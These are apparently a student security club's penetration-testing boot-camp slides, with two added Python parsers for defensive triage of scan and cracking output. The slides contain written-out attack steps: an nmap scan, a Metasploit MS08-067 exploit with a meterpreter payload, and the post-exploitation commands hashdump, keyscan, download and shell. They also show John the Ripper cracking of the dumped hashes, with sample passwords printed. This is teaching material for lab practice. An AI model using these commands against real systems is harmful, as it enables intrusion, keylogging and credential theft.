Penetration Testing 101 (Boot-camp)

Penetration Testing 101 (Boot-camp)
Computer Security Group
Mitchell Adair
utdcsg.org

Outline
“Interactive” meeting
Introduction to Backtrack
A mini penetration test
    Scenario
    Methodology: Enumeration, Exploitation, Post Exploitation
    Exercise
Summary
Resources

Scenario
Company X wants you to test whether their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

Outline
Enumeration
    OS, services, versions, filters
Exploitation
    Match a service + version to a known vulnerability
    Exploit, getting shell access to the box
Post Exploitation
    Shell is just the beginning... ;)
    Hashes, SSH / GPG keys, pivot, …

Enumeration
'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org

    nmap [Scan Type(s)] [Options] {target specification}

Scan Types
    -sS, SYN scan
    -sT, Connect scan
    -sA, ACK scan
    …
Options
    -O, OS detection
    -sV, service/version detection
    -v, verbose
    …

… Enumeration
    nmap 192.168.1.1
        Default scan (SYN scan when run as root, Connect scan otherwise), top 1000 ports
    nmap -v -sV -O 192.168.1.1 -p 1-65535
        Verbose, service versions, OS detection, ports 1 through 65535
    nmap -PN --script=smb* -sV -O 192.168.1.1
        Don't ping, run all smb* scripts, service versions, OS detection

Nmap Output
    Not shown: 996 closed ports
    PORT     STATE SERVICE      VERSION
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
    1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
    ...
    OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1

    Host script results:
    | smb-os-discovery: Windows 2000
    | smb-enum-domains:
    |   Domain: MITCHELL-32D5C5
    |   |_ SID: S-1-5-21-606747145-1647877149-725345543
    |   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
    | Anonymous shares: IPC$
    |_ Restricted shares: ADMIN$, C$
    | smb-check-vulns:
    |_ MS08-067: VULNERABLE
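As an added example (not part of the slides), a small parser for the normal-format nmap output above that pulls out what a defender needs from the scan: open ports, the OS guess, the users enumerated over anonymous SMB and the NSE vulnerability hit, then turns them into a fix list. The sample is the slide's own output with whitespace re-aligned; the field names and triage rules are my own.

```python
import re
# The slide's Nmap output (abbreviated), embedded so the parser runs offline.
NMAP_OUTPUT = r"""Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1
Host script results:
| smb-os-discovery: Windows 2000
| smb-enum-domains:
|   Domain: MITCHELL-32D5C5
|   |_ SID: S-1-5-21-606747145-1647877149-725345543
|   |_ Users: add, Administrator, Guest, s3cr3tus3r, sally
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# One port line: "<port>/<proto> <state> <service> [<version>]".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Pull ports, OS guess, enumerated SMB users and NSE vuln hits out of nmap's text output."""
    host = {"ports": [], "os": None, "users": [], "vulnerable": []}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            host["ports"].append({"port": int(port), "proto": proto, "state": state,
                                  "service": service, "version": version.strip()})
        elif line.startswith("OS details:"):
            host["os"] = line.split(":", 1)[1].strip()
        elif line.startswith("|"):           # NSE script output, tree-drawn with | and |_
            body = line.lstrip("|_ ")
            if body.startswith("Users:"):
                host["users"] = [u.strip() for u in body[len("Users:"):].split(",")]
            elif body.endswith(": VULNERABLE"):
                host["vulnerable"].append(body[:-len(": VULNERABLE")])
    return host

def triage(host):
    """The fix list a defender hands back from the parsed scan (my own rules)."""
    actions = [f"apply the {v} patch" for v in host["vulnerable"]]
    if any(p["port"] == 445 and p["state"] == "open" for p in host["ports"]):
        actions.append("SMB (445/tcp) reachable: firewall it from untrusted networks")
    if "Guest" in host["users"]:
        actions.append("Guest account enumerable via anonymous SMB: disable it")
    return actions
```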

Exploitation
Metasploit – Penetration Testing Framework: tools, libraries, modules, and user interfaces

    # msfconsole
    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    msf exploit(ms08_067_netapi) > exploit

Post Exploitation
Gather useful information
    SSH & GPG keys, hashes, etc...
    Meterpreter “post” modules
Pivot

    meterpreter > hashdump
    sysinfo
    keyscan_(start | stop | dump)
    download
    migrate
    shell

… Post Exploitation
We dumped the hashes... now what?
    Pass the hash
    Crack the hash: John the Ripper
John the Ripper, a tool to find weak passwords of your users

    john [options] password-files
        --wordlist
        --users, --groups
        --session, --restore

… Post Exploitation
    john --wordlist=/.../password.lst /tmp/hashes.txt
    Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
    ABC123           (sally)
    SECRET           (s3cr3tus3r)
                     (Guest)
    BASKETB          (webmaster:1)
    ALL              (webmaster:2)
    ADMIN1           (Administrator)
    guesses: 5  time: 0:00:00:00 100%  c/s: 25730  trying: SKIDOO - ZHONGGU
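The john output above, parsed and turned into a password audit as an added example (not code from the slides). The user:1 / user:2 lines are LM hash halves: LM upper-cases the password, pads it to 14 characters and hashes each 7-character half independently, so John cracks and prints them separately and webmaster's BASKETB + ALL recombine to BASKETBALL. The parser and the audit thresholds are my own.

```python
import re
# John's cracking output as shown on the slide (the page's own sample),
# embedded so the example runs offline.
JOHN_OUTPUT = """Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123           (sally)
SECRET           (s3cr3tus3r)
                 (Guest)
BASKETB          (webmaster:1)
ALL              (webmaster:2)
ADMIN1           (Administrator)
guesses: 5  time: 0:00:00:00 100%  c/s: 25730  trying: SKIDOO - ZHONGGU
"""

# "<password> (<user>)" or, for an LM half, "<half> (<user>:1|2)".
CRACKED_RE = re.compile(r"^(.*?)\s*\((\S+?)(?::([12]))?\)$")

def parse_john(text):
    """Return (user, half, fragment) tuples; half is None for a whole password, else 1 or 2."""
    rows = []
    for line in text.splitlines():
        m = CRACKED_RE.match(line)
        if m:
            fragment, user, half = m.groups()
            rows.append((user, int(half) if half else None, fragment))
    return rows

def assemble(rows):
    """Rebuild full passwords. LM halves are joined in order; an uncracked
    first half is shown as ??????? rather than silently dropped. Letter case
    is not recoverable from LM output (LM upper-cases before hashing)."""
    halves, passwords = {}, {}
    for user, half, fragment in rows:
        if half is None:
            passwords[user] = fragment
        else:
            halves.setdefault(user, {})[half] = fragment
    for user, parts in halves.items():
        passwords[user] = parts.get(1, "???????") + parts.get(2, "")
    return passwords

def audit(passwords):
    """Accounts a defender must reset: empty or shorter than 8 characters (my thresholds)."""
    weak = {}
    for user, pw in passwords.items():
        if pw == "":
            weak[user] = "empty password"
        elif len(pw) < 8:
            weak[user] = "shorter than 8 characters"
    return weak
```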

So... let's get started
Boot up to your Backtrack CD

    passwd
    /etc/init.d/networking start
    startx

Follow along... let's pwn this box :)

Summary
Clearly... Company X's default user workstations need some work. Now let's do the paperwork!... just kidding ;)
Hopefully this gives everyone a hands-on introduction to Backtrack, some essential tools, and the attacker's mindset & process.
Feedback is always appreciated!

Resources
utdcsg.org - Presentations, articles, resources, etc.
IRC - irc.oftc.net, #utdcsg
Nmap - nmap.org/5/
Metasploit - metasploit.com/
John the Ripper - openwall.com/john/